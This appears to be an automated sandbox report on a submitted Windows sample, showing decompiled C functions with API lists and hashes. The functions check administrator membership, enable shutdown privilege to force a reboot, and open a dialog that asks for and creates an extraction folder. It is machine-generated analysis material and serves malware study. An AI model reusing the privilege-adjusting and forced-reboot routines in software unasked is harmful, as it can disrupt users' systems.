                                                                                                                                                                                                                                                0x00051984
                                                                                                                                                                                                                                                0x00051985
                                                                                                                                                                                                                                                0x0005198a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005198c
                                                                                                                                                                                                                                                0x00051991
                                                                                                                                                                                                                                                0x00051996
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051996
                                                                                                                                                                                                                                                0x0005194c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000518DD), ref: 0005181A
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0005182C
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: AllocateAndInitializeSid.ADVAPI32(000518DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000518DD), ref: 00051855
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: FreeSid.ADVAPI32(?,?,?,?,000518DD), ref: 00051883
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: FreeLibrary.KERNEL32(00000000,?,?,?,000518DD), ref: 0005188A
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000518EB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 000518F2
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0005190A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00051918
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 0005192C
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00051944
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00051964
                                                                                                                                                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 0005197A
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 0005199C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 000519A3
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000519AD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                • Opcode ID: ced17d5f1614ed76ca0d243ef988a0b440ea2ce9aef9d55e21df9e19df1f1dea
                                                                                                                                                                                                                                                • Instruction ID: 38fb917ef910f8fb694bd5f6874438a6abf6a3ba0c8b502fce94c878ace9f41e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ced17d5f1614ed76ca0d243ef988a0b440ea2ce9aef9d55e21df9e19df1f1dea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3314D71A0020AAFEB609FA5DC58BFFBBBCFF05302F104529E945E2190DB359949CB61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                                                                                                                			E00051F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                				int _t28;
                                                                                                                                                                                                                                                				signed char _t30;
                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t41 = __esi;
                                                                                                                                                                                                                                                				_t38 = __edi;
                                                                                                                                                                                                                                                				_t30 = __ecx;
                                                                                                                                                                                                                                                				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						if( *0x59a40 != 0) {
                                                                                                                                                                                                                                                							_pop(_t30);
                                                                                                                                                                                                                                                							_t44 = _t46;
                                                                                                                                                                                                                                                							_t13 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                                							_push(_t38);
                                                                                                                                                                                                                                                							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                                								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                                								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                                								_v12 = 2;
                                                                                                                                                                                                                                                								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                                								CloseHandle(_v28);
                                                                                                                                                                                                                                                								_t41 = _t41;
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								if(_t21 != 0) {
                                                                                                                                                                                                                                                									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                                										_t25 = 1;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t37 = 0x4f7;
                                                                                                                                                                                                                                                										goto L3;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t37 = 0x4f6;
                                                                                                                                                                                                                                                									goto L4;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t37 = 0x4f5;
                                                                                                                                                                                                                                                								L3:
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								L4:
                                                                                                                                                                                                                                                								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								E000544B9(0, _t37);
                                                                                                                                                                                                                                                								_t25 = 0;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_pop(_t40);
                                                                                                                                                                                                                                                							return E00056CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t37 = 0x522;
                                                                                                                                                                                                                                                						_t28 = E000544B9(0, 0x522, 0x51140, 0, 0x40, 4);
                                                                                                                                                                                                                                                						if(_t28 != 6) {
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					__eax = E00051EA7(__ecx);
                                                                                                                                                                                                                                                					if(__eax != 2) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						return _t28;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00051EFB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00051F02
                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00051FD3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                • Opcode ID: fc5e04e823e1e788c84ad1b09d6b4c5906d4753f3dd9396d09790d0383f48f93
                                                                                                                                                                                                                                                • Instruction ID: 9e967640ab2ad72ddcea9ce18dfb22b486d1fbfedb8e402bf53fb3e94880623e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc5e04e823e1e788c84ad1b09d6b4c5906d4753f3dd9396d09790d0383f48f93
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21E471B40305ABEB605BA19C4AFFF3AB8EB85B13F100128FE02E60C1D77888089765
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00057155() {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				struct _FILETIME _v16;
                                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                                				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                                				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                                				_t23 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                                					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                                					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                                					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                                					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                                					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                                					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                                					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                                					_t39 = _t36;
                                                                                                                                                                                                                                                					if(_t36 == 0xbb40e64e || ( *0x58004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                                						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                                						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x58004 = _t39;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t37 =  !_t36;
                                                                                                                                                                                                                                                				 *0x58008 = _t37;
                                                                                                                                                                                                                                                				return _t37;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00057182
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00057191
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0005719A
                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 000571A3
                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 000571B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                                                • Opcode ID: 0efe0a41627acca3237cc29d35ae42bdef0082e2570a40c3fe5d1b395773805a
                                                                                                                                                                                                                                                • Instruction ID: 5ea035a603c3ac5b04d2035f13a244db3d4e136a96cdc31d60884fc89bb9f85e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0efe0a41627acca3237cc29d35ae42bdef0082e2570a40c3fe5d1b395773805a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2114C71E01708DFDB50DFB8EA48A9FBBF4EF08312FA14955D805E7250EA389A049B49
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00056CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                                0x00056cf7
                                                                                                                                                                                                                                                0x00056d00
                                                                                                                                                                                                                                                0x00056d19

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00056E26,00051000), ref: 00056CF7
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00056E26,?,00056E26,00051000), ref: 00056D00
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00056E26,00051000), ref: 00056D0B
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00056E26,00051000), ref: 00056D12
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                • Opcode ID: b630ee067fa1bf218faf736a4155dcf249d62b4c28a578b5dd814698f0aa587e
                                                                                                                                                                                                                                                • Instruction ID: baceed688d60b56487bfe997f943506a6714c6552e0a0f14060c7e8829f4d7e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b630ee067fa1bf218faf736a4155dcf249d62b4c28a578b5dd814698f0aa587e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8D0C932200B08BBFB002BF1EC0CA5B3F28EB4A213F444100F31982020CA3A54518B5A
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                			E00053210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				int _t20;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                                                                				char _t24;
                                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                                				int _t27;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                                				int _t38;
                                                                                                                                                                                                                                                				int _t39;
                                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                				CHAR* _t49;
                                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				struct HWND__* _t64;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t64 = _a4;
                                                                                                                                                                                                                                                				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t6 == 0) {
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					L38:
                                                                                                                                                                                                                                                					EndDialog(_t64, ??);
                                                                                                                                                                                                                                                					L39:
                                                                                                                                                                                                                                                					__eflags = 1;
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t42 = 1;
                                                                                                                                                                                                                                                				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                                				if(_t10 == 0) {
                                                                                                                                                                                                                                                					E000543D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                                					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                                					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                                					__eflags =  *0x59a40 - _t42; // 0x3
                                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                                						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L36:
                                                                                                                                                                                                                                                					return _t42;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t10 == _t42) {
                                                                                                                                                                                                                                                					_t20 = _a12 - 1;
                                                                                                                                                                                                                                                					__eflags = _t20;
                                                                                                                                                                                                                                                					if(_t20 == 0) {
                                                                                                                                                                                                                                                						_t21 = GetDlgItemTextA(_t64, 0x835, 0x591e4, 0x104);
                                                                                                                                                                                                                                                						__eflags = _t21;
                                                                                                                                                                                                                                                						if(_t21 == 0) {
                                                                                                                                                                                                                                                							L32:
                                                                                                                                                                                                                                                							_t58 = 0x4bf;
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x10);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							L25:
                                                                                                                                                                                                                                                							E000544B9(_t64, _t58);
                                                                                                                                                                                                                                                							goto L39;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t49 = 0x591e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t23 =  *_t49;
                                                                                                                                                                                                                                                							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                                							__eflags = _t23;
                                                                                                                                                                                                                                                						} while (_t23 != 0);
                                                                                                                                                                                                                                                						__eflags = _t49 - 0x591e5 - 3;
                                                                                                                                                                                                                                                						if(_t49 - 0x591e5 < 3) {
                                                                                                                                                                                                                                                							goto L32;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t24 =  *0x591e5; // 0x3a
                                                                                                                                                                                                                                                						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                                						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                                							L21:
                                                                                                                                                                                                                                                							_t25 = GetFileAttributesA(0x591e4);
                                                                                                                                                                                                                                                							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                                							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                								L26:
                                                                                                                                                                                                                                                								E0005658A(0x591e4, 0x104, 0x51140);
                                                                                                                                                                                                                                                								_t27 = E000558C8(0x591e4);
                                                                                                                                                                                                                                                								__eflags = _t27;
                                                                                                                                                                                                                                                								if(_t27 != 0) {
                                                                                                                                                                                                                                                									__eflags =  *0x591e4 - 0x5c;
                                                                                                                                                                                                                                                									if( *0x591e4 != 0x5c) {
                                                                                                                                                                                                                                                										L30:
                                                                                                                                                                                                                                                										_t30 = E0005597D(0x591e4, 1, _t64, 1);
                                                                                                                                                                                                                                                										__eflags = _t30;
                                                                                                                                                                                                                                                										if(_t30 == 0) {
                                                                                                                                                                                                                                                											L35:
                                                                                                                                                                                                                                                											_t42 = 1;
                                                                                                                                                                                                                                                											__eflags = 1;
                                                                                                                                                                                                                                                											goto L36;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                                                										_t42 = 1;
                                                                                                                                                                                                                                                										EndDialog(_t64, 1);
                                                                                                                                                                                                                                                										goto L36;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									__eflags =  *0x591e5 - 0x5c;
                                                                                                                                                                                                                                                									if( *0x591e5 == 0x5c) {
                                                                                                                                                                                                                                                										goto L31;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_t58 = 0x4be;
                                                                                                                                                                                                                                                								goto L25;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t32 = E000544B9(_t64, 0x54a, 0x591e4, 0, 0x20, 4);
                                                                                                                                                                                                                                                							__eflags = _t32 - 6;
                                                                                                                                                                                                                                                							if(_t32 != 6) {
                                                                                                                                                                                                                                                								goto L35;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t33 = CreateDirectoryA(0x591e4, 0);
                                                                                                                                                                                                                                                							__eflags = _t33;
                                                                                                                                                                                                                                                							if(_t33 != 0) {
                                                                                                                                                                                                                                                								goto L26;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x10);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x591e4);
                                                                                                                                                                                                                                                							_t58 = 0x4cb;
                                                                                                                                                                                                                                                							goto L25;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags =  *0x591e4 - 0x5c;
                                                                                                                                                                                                                                                						if( *0x591e4 != 0x5c) {
                                                                                                                                                                                                                                                							goto L32;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                                						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                                							goto L32;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L21;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t34 = _t20 - 1;
                                                                                                                                                                                                                                                					__eflags = _t34;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						EndDialog(_t64, 0);
                                                                                                                                                                                                                                                						 *0x59124 = 0x800704c7;
                                                                                                                                                                                                                                                						goto L39;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                                					if(_t34 != 0x834) {
                                                                                                                                                                                                                                                						goto L36;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t37 = LoadStringA( *0x59a3c, 0x3e8, 0x58598, 0x200);
                                                                                                                                                                                                                                                					__eflags = _t37;
                                                                                                                                                                                                                                                					if(_t37 != 0) {
                                                                                                                                                                                                                                                						_t38 = E00054224(_t64, _t46, _t46);
                                                                                                                                                                                                                                                						__eflags = _t38;
                                                                                                                                                                                                                                                						if(_t38 == 0) {
                                                                                                                                                                                                                                                							goto L36;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t39 = SetDlgItemTextA(_t64, 0x835, 0x587a0);
                                                                                                                                                                                                                                                						__eflags = _t39;
                                                                                                                                                                                                                                                						if(_t39 != 0) {
                                                                                                                                                                                                                                                							goto L36;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t63 = 0x4c0;
                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                						E000544B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						goto L38;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t63 = 0x4b1;
                                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}

























                                                                                                                                                                                                                                                0x00053435
                                                                                                                                                                                                                                                0x00053437
                                                                                                                                                                                                                                                0x00053437
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053437
                                                                                                                                                                                                                                                0x000533c7
                                                                                                                                                                                                                                                0x000533c9
                                                                                                                                                                                                                                                0x000533cc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000533cc
                                                                                                                                                                                                                                                0x000533ad
                                                                                                                                                                                                                                                0x000533b4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000533b4
                                                                                                                                                                                                                                                0x00053398
                                                                                                                                                                                                                                                0x00053399
                                                                                                                                                                                                                                                0x0005339b
                                                                                                                                                                                                                                                0x0005339c
                                                                                                                                                                                                                                                0x0005339d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005339d
                                                                                                                                                                                                                                                0x0005334c
                                                                                                                                                                                                                                                0x00053351
                                                                                                                                                                                                                                                0x00053354
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005335c
                                                                                                                                                                                                                                                0x00053362
                                                                                                                                                                                                                                                0x00053364
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053366
                                                                                                                                                                                                                                                0x00053367
                                                                                                                                                                                                                                                0x00053369
                                                                                                                                                                                                                                                0x0005336a
                                                                                                                                                                                                                                                0x0005336b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005336b
                                                                                                                                                                                                                                                0x0005331c
                                                                                                                                                                                                                                                0x00053323
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053329
                                                                                                                                                                                                                                                0x0005332b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005332b
                                                                                                                                                                                                                                                0x0005324c
                                                                                                                                                                                                                                                0x0005324c
                                                                                                                                                                                                                                                0x0005324f
                                                                                                                                                                                                                                                0x000532c8
                                                                                                                                                                                                                                                0x000532ce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000532ce
                                                                                                                                                                                                                                                0x00053251
                                                                                                                                                                                                                                                0x00053256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053271
                                                                                                                                                                                                                                                0x00053277
